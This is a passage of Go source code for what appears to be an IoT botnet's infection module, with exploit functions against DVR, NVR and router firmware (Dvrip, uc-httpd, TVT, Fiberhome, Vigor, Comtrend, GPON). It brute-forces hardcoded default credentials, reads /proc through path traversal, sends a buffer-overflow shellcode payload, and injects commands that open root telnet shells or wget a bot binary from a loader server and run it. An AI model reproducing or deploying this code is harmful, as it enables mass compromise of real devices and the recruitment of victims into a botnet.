		    	conn.Close()
		    	return 0, nil, "", 0
		    }
	    } else if strings.Contains(string(second_buf), "admin$") {
	    	gotAdmin = 1
	    } else {
	    	conn.Close()
	    	return 0, nil, "", 0
	    }
   	}

   	if gotAdmin == 1  || gotShell == 1 {
   		conn.Write([]byte("shell\n"))
	   	conn.Write([]byte("/bin/busybox BOXOFABOX\n"))

	   	new_buf := make([]byte, 128)
	    l, err := conn.Read(new_buf)
	    if err != nil || l <= 0 {
	        conn.Close()
	        return 0, nil, "", 0
	    }

	    if strings.Contains(string(new_buf), "BOXOFABOX: applet not found") {
		   	conn.Write([]byte("/bin/busybox telnetd -p" + strconv.Itoa(rInt) + " -l/bin/sh\n"))
		    conn.Write([]byte("exit\n"))
		    conn.Write([]byte("quit\n"))
	   		conn.Close()

	   		time.Sleep(3 * time.Second)
	   		return 1, nil, password, rInt
	    } else {
		    conn.Write([]byte("exit\n"))
		    conn.Write([]byte("quit\n"))
	        conn.Close()
	        return 0, nil, "", 0
	    }
   	} else {
   		conn.Write([]byte("quit\n"))
   		conn.Close()
   		return 0, nil, "", 0
   	}
}

func infectFunctionLibdvr(target string) {

	splitStr := strings.Split(target, ":")
   	for i := 0; i < 3; i++ {
	    exploited, err, _, port := infectFunctionLibdvrProto(target, i)
	    if err != nil {
	        return
	    }

	    if exploited == 1 {
	    	fmt.Printf("\x1b[38;5;46mLibdvr\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential telnet shell\x1b[38;5;15m\r\n", target)
	    	telnetLoader(splitStr[0] + ":" + strconv.Itoa(port), 0, "arm7", loaderLibdvrTag)
	        return
	    }
	}
}

func infectFunctionDvrip(target string) {

	var (
		bytebuf []byte = []byte("")
		adminPasswords []string = []string{"tlJwpbo6", "S2fGqNFs", "OxhlwSG8", "ORsEWe7l", "nTBCS19C"}
		username string = "admin"
		password string = ""
		attempt int = 0
		authed int = 0
	)

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
		return
    }

    for
	{
		if attempt >= 5 {
			break
		} else {
			password = adminPasswords[attempt]
		}

		conn.Write([]byte("\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\x03\x64\x00\x00\x00{ \"EncryptType\" : \"MD5\", \"LoginType\" : \"DVRIP-Web\", \"PassWord\" : \"" + password + "\", \"UserName\" : \"" + username + "\" }\x0a"))

		for {
	        tmpbuf := make([]byte, 128)
	        ln, err := conn.Read(tmpbuf)
	        if ln <= 0 || err != nil {
	            break
	        }

	        bytebuf = append(bytebuf, tmpbuf...)
	        if strings.Contains(string(bytebuf), "}") {
	        	break
	        }
	    }

		dvrret, err := strconv.Atoi(getStringInBetween(string(bytebuf), "\"Ret\" : ", ", \"SessionID"))
		if err != nil {
			authed = 0
			break
	    }

		if dvrret == DVRIP_OK {
			authed = 1
		}

		dvrret = DVRIP_NORESP

		if authed == 1 {
			break
		}
			
		attempt++
		continue
	}

	if authed != 1 {
		conn.Close()
		return
	}

	conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xee\x03\x35\x00\x00\x00{ \"Name\" : \"KeepAlive\", \"SessionID\" : \"0x00000004\" }\x0a"))
	zeroByte(bytebuf)

	for {
	    tmpbuf := make([]byte, 128)
	    ln, err := conn.Read(tmpbuf)
	    if ln <= 0 || err != nil {
	        conn.Close()
	        return
	    }

	    bytebuf = append(bytebuf, tmpbuf...)
	    if strings.Contains(string(bytebuf), "}") {
	        break
	    }
	}

	zeroByte(bytebuf)
	conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x05\x73\x00\x00\x00{ \"Name\" : \"OPSystemUpgrade\", \"OPSystemUpgrade\" : { \"Action\" : \"Start\", \"Type\" : \"System\" }, \"SessionID\" : \"0x00000004\" }\x0a"))

	for {
	    tmpbuf := make([]byte, 128)
	    ln, err := conn.Read(tmpbuf)
	    if ln <= 0 || err != nil {
	        conn.Close()
	        return
	    }

	    bytebuf = append(bytebuf, tmpbuf...)
	    if strings.Contains(string(bytebuf), "}") {
	        break
	    }
	}

	zeroByte(bytebuf)
	conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x05\x62\x01\x00\x00\x50\x4B\x03\x04\x14\x03\x00\x00\x08\x00\x2C\x87\x1A\x4F\x9A\xF8\xB3\x9E\xC6\x00\x00\x00\x23\x02\x00\x00\x0B\x00\x00\x00\x49\x6E\x73\x74\x61\x6C\x6C\x44\x65\x73\x63\xB5\x90\x3D\x0B\xC2\x30\x10\x86\x77\x7F\xC5\x91\xD9\x62\x15\x1C\x74\xAD\x88\xAE\x56\x5D\xC4\x21\x35\x87\x0D\xC6\xE4\x48\xE2\x47\x91\xFE\x77\xDB\x14\x11\xAB\x8B\x88\x37\x64\x79\xDE\x7B\x2E\x77\xB7\x0E\x00\x5B\xD1\xDE\x72\x81\x89\x39\x1E\xB9\x16\x6C\x0C\x9B\x0E\x54\x55\xB1\x50\xEC\x09\x58\x9A\xA3\x52\xAC\xFB\x20\xE9\xCE\x4A\xF2\x35\xF0\xA8\x34\x7A\x01\x11\xC1\x28\x8E\xFB\x10\x29\xE8\x65\x52\xF7\x5C\xCE\x42\xB8\xEC\x7E\xEF\xCC\x4E\xAE\xC8\xCC\x15\xFE\xE1\x76\x0A\x91\x60\x30\x1C\x0D\xE2\xF8\xF7\x1F\x7E\xB0\x55\xEF\xB6\xEE\x60\x33\x6E\xC5\x85\x5B\x0C\xA2\x83\xA4\x24\xC7\xDD\x81\x05\x94\x9E\x88\x8C\xF5\x53\xC5\x5D\xBE\x2C\x08\xDF\x4F\x1F\xD0\x7C\xF2\xD2\xDB\x1E\x30\xC1\x73\x48\xB4\xED\x6B\xD4\xC2\xD8\x36\x68\x36\x23\xEE\x65\xA6\x70\x8D\xD6\x49\xA3\xAB\x4C\xD4\x6F\xD0\x22\x69\xCD\x2A\xEF\x50\x4B\x01\x02\x3F\x03\x14\x03\x00\x00\x08\x00\x2C\x87\x1A\x4F\x9A\xF8\xB3\x9E\xC6\x00\x00\x00\x23\x02\x00\x00\x0B\x00\x24\x00\x00\x00\x00\x00\x00\x00\x20\x80\xA4\x81\x00\x00\x00\x00\x49\x6E\x73\x74\x61\x6C\x6C\x44\x65\x73\x63\x0A\x00\x20\x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xCA\x6F\xF3\x26\x5C\xD5\x01\x00\x40\x5B\x5C\x2F\x5C\xD5\x01\x80\xD6\xF3\x5C\x2F\x5C\xD5\x01\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x5D\x00\x00\x00\xEF\x00\x00\x00\x00\x00"))
	
	for {
	    tmpbuf := make([]byte, 128)
	    ln, err := conn.Read(tmpbuf)
	    if ln <= 0 || err != nil {
	        conn.Close()
	        return
	    }

	    bytebuf = append(bytebuf, tmpbuf...)
	    if strings.Contains(string(bytebuf), "}") {
	        break
	    }
	}

	zeroByte(bytebuf)
	conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x01\xf2\x05\x00\x00\x00\x00"))

	splitStr := strings.Split(target, ":")
	time.Sleep(10 * time.Second)

    fmt.Printf("\x1b[38;5;46mDvrip\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential telnet shell opened\x1b[38;5;15m\r\n", target)
    go telnetLoader(splitStr[0] + ":9001", 0, "arm7", loaderDvripTag)

	conn.Write([]byte("\xFF\x01\x00\x00\x57\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x03\x27\x00\x00\x00{ \"Name\" : \"\", \"SessionID\" : \"0x00000004\" }\x0a"))
	conn.Close()
	return
}

/* ------ END OF THE OTHER STUFF ------ */

func ucSofiaCheck(target string, pid string) (found int) {

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return -1
    }

    defer conn.Close()
    tmp := make([]byte, 256)
    buf := make([]byte, 0, 512)

    fmt.Fprintf(conn, "GET ../../proc/%s/cmdline HTTP\r\n\r\n", pid)
    for {
        n, err := conn.Read(tmp)
        if err != nil {
            break
        }

        buf = append(buf, tmp[:n]...)
    }

    if (strings.Contains(string(buf), "/var/Sofia") || strings.Contains(string(buf), "usr/bin/Sofia") || strings.Contains(string(buf), "system_sofia") || strings.Contains(string(buf), "/var/bin/system_sofia")) && !strings.Contains(string(buf), "dvrHelper") {
        return 1
    } else {
        return -1
    }
}

func ucGuessSmaps(target string, pid string) (found int) {

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return -1
    }

    defer conn.Close()
    tmp := make([]byte, 8096)
    buf := make([]byte, 0, 512)

    fmt.Fprintf(conn, "GET ../../proc/%s/smaps HTTP\r\n\r\n", pid)
    for {
        n, err := conn.Read(tmp)
        if err != nil {
            break
        }

        buf = append(buf, tmp[:n]...)
    }

    smapsLines := strings.Split(string(buf), "\n")
    smapsCount := 0
    gotRegion := 0
    regionsAdded := 0

    for i := 0; i < len(smapsLines); i++ {
        if !strings.Contains(string(smapsLines[i]), "rwxp") {
            continue
        }

        smapsCount++
    }

    smapsRegions := make([]*smapsRegion, smapsCount)
    for i := range smapsRegions {
        smapsRegions[i] = &smapsRegion{}
    }

    for i := 0; i < len(smapsLines); i++ {
        if gotRegion == 8 || gotRegion == 0 {
            if !strings.Contains(string(smapsLines[i]), "rwxp") {
                continue
            }

            region := strings.Split(string(smapsLines[i]), "-")
            smapsRegions[regionsAdded].region = hexToInt(region[0])

            for q := 0; q < len(region); q++ {
                region[q] = ""
            }

            gotRegion = 1
        } else {
            if gotRegion == 1 {
                startAt := 0
                endAt := 0

                for q := 0; q < len(smapsLines[i]); q++ {
                    if startAt == 0 {
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
                            startAt = q
                            continue
                        }
                    }
                    if endAt == 0 && startAt > 0 {
                        if smapsLines[i][q:q+1] == " " {
                            endAt = q
                            continue
                        }
                    }
                }

                if startAt > 0 && endAt > 0 {
                    smapsRegions[regionsAdded].size, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
                    gotRegion = 2
                    continue
                }

            } else if gotRegion == 2 {
                startAt := 0
                endAt := 0

                for q := 0; q < len(smapsLines[i]); q++ {
                    if startAt == 0 {
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
                            startAt = q
                            continue
                        }
                    }
                    if endAt == 0 && startAt > 0 {
                        if smapsLines[i][q:q+1] == " " {
                            endAt = q
                            continue
                        }
                    }
                }

                if startAt > 0 && endAt > 0 {
                    smapsRegions[regionsAdded].rss, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
                    gotRegion = 3
                    continue
                }
            } else if gotRegion == 3 {
                startAt := 0
                endAt := 0

                for q := 0; q < len(smapsLines[i]); q++ {
                    if startAt == 0 {
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
                            startAt = q
                            continue
                        }
                    }
                    if endAt == 0 && startAt > 0 {
                        if smapsLines[i][q:q+1] == " " {
                            endAt = q
                            continue
                        }
                    }
                }

                if startAt > 0 && endAt > 0 {
                    smapsRegions[regionsAdded].pss, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
                    gotRegion = 4
                    continue
                }
            } else if gotRegion == 4 {
                startAt := 0
                endAt := 0

                for q := 0; q < len(smapsLines[i]); q++ {
                    if startAt == 0 {
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
                            startAt = q
                            continue
                        }
                    }
                    if endAt == 0 && startAt > 0 {
                        if smapsLines[i][q:q+1] == " " {
                            endAt = q
                            continue
                        }
                    }
                }

                if startAt > 0 && endAt > 0 {
                    smapsRegions[regionsAdded].shared_clean, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
                    gotRegion = 5
                    continue
                }
            } else if gotRegion == 5 {
                startAt := 0
                endAt := 0

                for q := 0; q < len(smapsLines[i]); q++ {
                    if startAt == 0 {
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
                            startAt = q
                            continue
                        }
                    }
                    if endAt == 0 && startAt > 0 {
                        if smapsLines[i][q:q+1] == " " {
                            endAt = q
                            continue
                        }
                    }
                }

                if startAt > 0 && endAt > 0 {
                    smapsRegions[regionsAdded].shared_ditry, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
                    gotRegion = 6
                    continue
                }
            } else if gotRegion == 6 {
                startAt := 0
                endAt := 0

                for q := 0; q < len(smapsLines[i]); q++ {
                    if startAt == 0 {
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
                            startAt = q
                            continue
                        }
                    }
                    if endAt == 0 && startAt > 0 {
                        if smapsLines[i][q:q+1] == " " {
                            endAt = q
                            continue
                        }
                    }
                }

                if startAt > 0 && endAt > 0 {
                    smapsRegions[regionsAdded].private_clean, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
                    gotRegion = 7
                    continue
                }
            } else if gotRegion == 7 {
                startAt := 0
                endAt := 0

                for q := 0; q < len(smapsLines[i]); q++ {
                    if startAt == 0 {
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
                            startAt = q
                            continue
                        }
                    }
                    if endAt == 0 && startAt > 0 {
                        if smapsLines[i][q:q+1] == " " {
                            endAt = q
                            continue
                        }
                    }
                }

                if startAt > 0 && endAt > 0 {
                    smapsRegions[regionsAdded].private_dirty, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
                    gotRegion = 8
                    regionsAdded++
                    continue
                }
            }

            gotRegion++
        }
    }

    for i := len(smapsRegions) - 7; i > 1; i-- {
        if smapsRegions[i].size == 8188 && smapsRegions[i + 1].size == 8188 && smapsRegions[i + 2].size == 8188 && smapsRegions[i + 3].size == 8188 && smapsRegions[i + 4].size == 8188 && smapsRegions[i + 5].size == 8188 && smapsRegions[i + 6].size == 8188 {
            if smapsRegions[i].rss == 4 && smapsRegions[i + 1].rss == 4 && smapsRegions[i + 2].rss == 4 && smapsRegions[i + 3].rss >= 8 && smapsRegions[i + 4].rss >= 4 && smapsRegions[i + 5].rss >= 4 && smapsRegions[i + 6].rss >= 8 {
                return int(smapsRegions[i + 3].region)
            }
        }
    }

    return 0
}

func ucSendBof(target string, offset int) {

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    defer conn.Close()

    v := uint32(offset)
    offsetBuf := make([]byte, 4)
    binary.LittleEndian.PutUint32(offsetBuf, v)

    conn.Write([]byte("GET "))
    conn.Write([]byte(uchttpdShellCode))

    for i := 0; i < 299 - len(uchttpdShellCode); i ++ {
        conn.Write([]byte("a"))
    }

    conn.Write([]byte(offsetBuf))
    conn.Write([]byte(" HTTP\r\n\r\n"))

    buf := make([]byte, 0, 512)
    tmp := make([]byte, 256)

    for {
        n, err := conn.Read(tmp)
        if err != nil {
            break
        }

        buf = append(buf, tmp[:n]...)
    }

    zeroByte(buf)
    zeroByte(tmp)
}

func infectFunctionUchttpd(target string) {

    var pidStrs[128] string
    var pidsFound int = 0

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    /* Dvrip check */
    go func() {
        ipslit := strings.Split(target, ":")
        tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":34567", 10 * time.Second)
        if err == nil {
        	tmpconn.Close()
        	infectFunctionDvrip(ipslit[0] + ":34567")
        }
    } ()
    /* ////////////// */

    /* Libdvr check */
    go func() {
        ipslit := strings.Split(target, ":")
        tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":9527", 10 * time.Second)
        if err == nil {
        	tmpconn.Close()
        	infectFunctionLibdvr(ipslit[0] + ":9527")
        }
    } ()
    /* ////////////// */

    tmp := make([]byte, 256)
    buf := make([]byte, 0, 512)

    fmt.Fprintf(conn, "GET ../../proc/ HTTP\r\n\r\n")
    for {
        n, err := conn.Read(tmp)
        if err != nil {
            break
        }

        buf = append(buf, tmp[:n]...)
    }

    if !strings.Contains(string(buf), "Index of /mnt/web/") {
        zeroByte(tmp)
        zeroByte(buf)
        conn.Close()
        time.Sleep(10 * time.Second)
        return
    }

    zeroByte(tmp)
    zeroByte(buf)

    conn.Close()
    conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
    	time.Sleep(10 * time.Second)
        return
    }

    buf = make([]byte, 0, 8096)
    tmp = make([]byte, 256)

    fmt.Fprintf(conn, "GET ../../proc/ HTTP\r\n\r\n")
    for {
        n, err := conn.Read(tmp)
        if err != nil {
            break
        }

        buf = append(buf, tmp[:n]...)
    }

    pids := strings.Split(string(buf), "\n")
    for i := 0; i < len(pids); i++ {
        if i >= 128 {
            break
        }

        if len(pids[i]) < 38 {
            continue
        }

        if _, err := strconv.Atoi(pids[i][33:34]); err != nil {
            continue
        }

        pidstr := pids[i][33:38]
        if _, err := strconv.Atoi(pidstr[0:1]); err == nil {
            if _, err := strconv.Atoi(pidstr[1:2]); err == nil {
                if _, err := strconv.Atoi(pidstr[2:3]); err == nil {
                    if _, err := strconv.Atoi(pidstr[3:4]); err == nil {
                        if _, err := strconv.Atoi(pidstr[4:5]); err == nil {
                            if len(pidstr[0:]) >= 5 {
                                pidStrs[pidsFound] = pidstr[0:5]
                                pidsFound++
                                continue
                            }
                        } else {
                            if len(pidstr[0:]) >= 4 {
                                pidStrs[pidsFound] = pidstr[0:4]
                                pidsFound++
                                continue
                            }
                        }
                    } else {
                        if len(pidstr[0:]) >= 3 {
                            pidStrs[pidsFound] = pidstr[0:3]
                            pidsFound++
                            continue
                        }
                    }
                } else {
                    if len(pidstr[0:]) >= 2 {
                        pidStrs[pidsFound] = pidstr[0:2]
                        pidsFound++
                        continue
                    }
                }
            } else {
                if len(pidstr[0:]) >= 1 {
                    pidStrs[pidsFound] = pidstr[0:1]
                    pidsFound++
                    continue
                }
            }
        }

        pidstr = ""
    }

    zeroByte(buf)
    zeroByte(tmp)

    if pidsFound <= 5 {
        conn.Close()
        time.Sleep(10 * time.Second)
        return
    }

    conn.Close()

    for i := pidsFound; i > 1; i-- {
        retval := ucSofiaCheck(target, pidStrs[i])
        if retval == -1 {
            continue
        }

        retval = ucGuessSmaps(target, pidStrs[i])
        if retval == -1 {
            continue
        }

        stackOffset := retval + 0x7fd3d8 + 20
        ucSendBof(target, stackOffset)
        break
    }

    for i := 0; i < pidsFound; i++ {
        pidStrs[i] = ""
    }

    zeroByte(buf)
    zeroByte(tmp)
    time.Sleep(10 * time.Second)
    return
}

func infectFunctionTvt(target string) {

    var rdbuf []byte = []byte("")

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    /* TVT4567 check */
    go func() {
        ipslit := strings.Split(target, ":")
        tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":4567", 10 * time.Second)
        if err == nil {
            infectFunctionTvt4567(tmpconn)
        }

        return
    } ()
    /* ////////////// */

    payload := "<?xml version=\"1.0\" encoding=\"utf-8\"?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\"filterTypeMode\">refuse</filterType><filterList type=\"list\"><itemType><addressType type=\"addressType\"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$("
    payload += tvtWebPayload
    payload += ")</ip></item></filterList></content></request>"

    cntlen := strconv.Itoa(len(payload))

    conn.Write([]byte("POST /editBlackAndWhiteList HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: " + cntlen + "\r\nAccept-Language: en-us\r\nHost: " + target + "\r\nAccept: */*\r\nUser-Agent: Mozila/5.0\r\nConnection: close\r\nCache-Control: max-age=0\r\nContent-Type: text/xml\r\nAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=\r\n\r\n" + payload + "\r\n\r\n"))

    for {
        tmpbuf := make([]byte, 128)
        ln, err := conn.Read(tmpbuf)
        if ln <= 0 || err != nil {
            break
        }

        rdbuf = append(rdbuf, tmpbuf...)
        if strings.Contains(string(rdbuf), "<status>success</status>") {
            fmt.Printf("\x1b[38;5;46mTvt\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
            payloadSent++
            break
        }
    }

    conn.Close()
    time.Sleep(10 * time.Second)
}

func infectFunctionFiberhome(target string) {

    var (
        rdbuf []byte = []byte("")
        authed int = 0
        telnetPort int = 0
    )

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    conn.Write([]byte("POST /goform/webLogin HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 23\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nReferer: http://" + target + "/login_inter.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\nUser=admin&Passwd=admin\r\n\r\n"))
    
    for {
        tmpbuf := make([]byte, 128)
        ln, err := conn.Read(tmpbuf)
        if ln <= 0 || err != nil {
            break
        }

        rdbuf = append(rdbuf, tmpbuf...)
        if strings.Contains(string(rdbuf), "Set-Cookie: loginName=admin") {
            authed = 1
            break
        }
    }

    conn.Close()

    if authed == 0 {
        return
    }

    conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    conn.Write([]byte("GET /menu_inter.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://" + target + "/login_inter.asp\r\nConnection: keep-alive\r\nCookie: loginName=admin\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
    
    for {
        tmpbuf := make([]byte, 128)
        ln, err := conn.Read(tmpbuf)
        if ln <= 0 || err != nil {
            break
        }

        rdbuf = append(rdbuf, tmpbuf...)
    
        if strings.Contains(string(rdbuf), "Set-Cookie: loginName=admin") {
            authed = 1
            break
        }
    }

    conn.Close()

    if fiberRandPort == 1 {
        rand.Seed(time.Now().UnixNano())
        telnetPort = rand.Intn(50000) + 10000
    } else {
        telnetPort = fiberStaticPort
    }

    for i := 0; i < len(fiberSecStrs); i++ {
        conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
        if err != nil {
            return
        }

        conn.Write([]byte("GET /goform/setPing?ping_ip=;telnetd%20-l/bin/sh%20-p" + strconv.Itoa(telnetPort) + "&requestNum=" + strconv.Itoa(i + 1) + "&diagtype=1&" + fiberSecStrs[i] + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nCookie: loginName=admin\r\n\r\n"))
        
        tmpbuf := make([]byte, 128)
        ln, err := conn.Read(tmpbuf)
        if ln <= 0 || err != nil {
            conn.Close()
            break
        }

        conn.Close()

        if !strings.Contains(string(rdbuf), "200 OK") {
            return
        }
    }

    time.Sleep(3 * time.Second)
    
    ipslit := strings.Split(target, ":")
    conn, err = net.DialTimeout("tcp", ipslit[0] + ":" + strconv.Itoa(telnetPort), 10 * time.Second)
    if err == nil {
        fmt.Printf("\x1b[38;5;46mFiberhome\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m telnet shell opened\x1b[38;5;15m\r\n", target)
        go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mips", loaderFiberhomeTag)
        conn.Close()
    }

    return
}

func infectFunctionVigor(target string) {

    var rdbuf []byte = []byte("")

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    payload := "action=login&keyPath=%27%0A%09%2F"
    payload += vigorPayload
    payload += "%27%0A%09%27&loginPwd=a&loginUser=a"
    cntlen := strconv.Itoa(len(payload))

    conn.Write([]byte("POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nContent-Length: " + cntlen + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n" + payload + "\r\n\r\n"))
    
    for {
        tmpbuf := make([]byte, 128)
        ln, err := conn.Read(tmpbuf)
        if ln <= 0 || err != nil {
            break
        }

        rdbuf = append(rdbuf, tmpbuf...)
        if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") {
            fmt.Printf("\x1b[38;5;46mVigor\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
            payloadSent++
            break
        }
    }

    conn.Close()
}

func infectFunctionComtrend(target string) {

    var (
        rdbuf []byte = []byte("")
        state = 0
        sessionKey = "null"
    )

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    conn.Write([]byte("GET /pingview.cmd HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\nConnection: close\r\nReferer: http://" + target + "/left.html\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
        
    for {
        tmpbuf := make([]byte, 128)
        ln, err := conn.Read(tmpbuf)
        if ln <= 0 || err != nil {
            break
        }

        rdbuf = append(rdbuf, tmpbuf...)
        if strings.Contains(string(rdbuf), "&sessionKey=") && strings.Contains(string(rdbuf), "var code = 'location=") && state != 1 {
            sessionKey = getStringInBetween(string(rdbuf), "   loc += '&sessionKey=", "';\n}\n\nvar code = 'location=\"' + loc + '\"';\n")
            
            if sessionKey == "null" {
                break
            }

            conn.Close()
            conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
            if err != nil {
                return
            }

            conn.Write([]byte("GET /ping.cgi?pingIpAddress=;cd%20/mnt;wget%20http://" + loaderDownloadServer + "/multi/wget.sh%20-O-%20>sfs;chmod%20777%20sfs;sh%20sfs%20" + loaderComtrendTag + ";&sessionKey=" + sessionKey + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\nConnection: close\r\nReferer: http://" + target + "/ping.cgi\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
            state = 1
        } else if state == 1 {
            if strings.Contains(string(rdbuf), "function btnPing()") {
                fmt.Printf("\x1b[38;5;46mComtrend\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
                payloadSent++
                conn.Close()
                return
            }
        }
    }

    conn.Close()
}

func infectFunctionGponFiber(target string) {

    var (
        rdbuf []byte = []byte("")
        logins []string = []string{"user:user", "adminisp:adminisp", "admin:stdONU101"}
        stage = 0
    )

    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }

    for i := 0; i < len(logins); i++ {
        loginSplit := strings.Split(logins[i], ":")

        conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
        if err != nil {
            return
        }

        cntlen := 14
        cntlen = len(loginSplit[0])
        cntlen = len(loginSplit[1])

        conn.Write([]byte("POST /boaform/admin/formLogin HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + strconv.Itoa(cntlen) + "\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nReferer: http://" + target + "/admin/login.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\nusername=" + loginSplit[0] + "&psd=" + loginSplit[1] + "\r\n\r\n"))
        
        for {
            tmpbuf := make([]byte, 128)
            ln, err := conn.Read(tmpbuf)
            if ln <= 0 || err != nil {
                break
            }

            rdbuf = append(rdbuf, tmpbuf...)
            if strings.Contains(string(rdbuf), "ERROR:bad password!") {
                zeroByte(rdbuf)
                break
            } else if (strings.Contains(string(rdbuf), "HTTP/1.0 302 Moved Temporarily") || strings.Contains(string(rdbuf), "ERROR:you have logined!")) && stage != 1{
                conn.Close()
                conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
                if err != nil {
                    return
                }

                payload := "target_addr=%3Brm%20-rf%20/var/tmp/stainfo%3Bwget%20http://" + loaderDownloadServer +  loaderBinsLocation + "bot.mips%20-O%20->/var/tmp/stainfo%3Bchmod%20777%20/var/tmp/stainfo%3B/var/tmp/stainfo%20" + loaderGponfiberTag + "&waninf=1_INTERNET_R_VID_"
                cntlen := strconv.Itoa(len(payload))

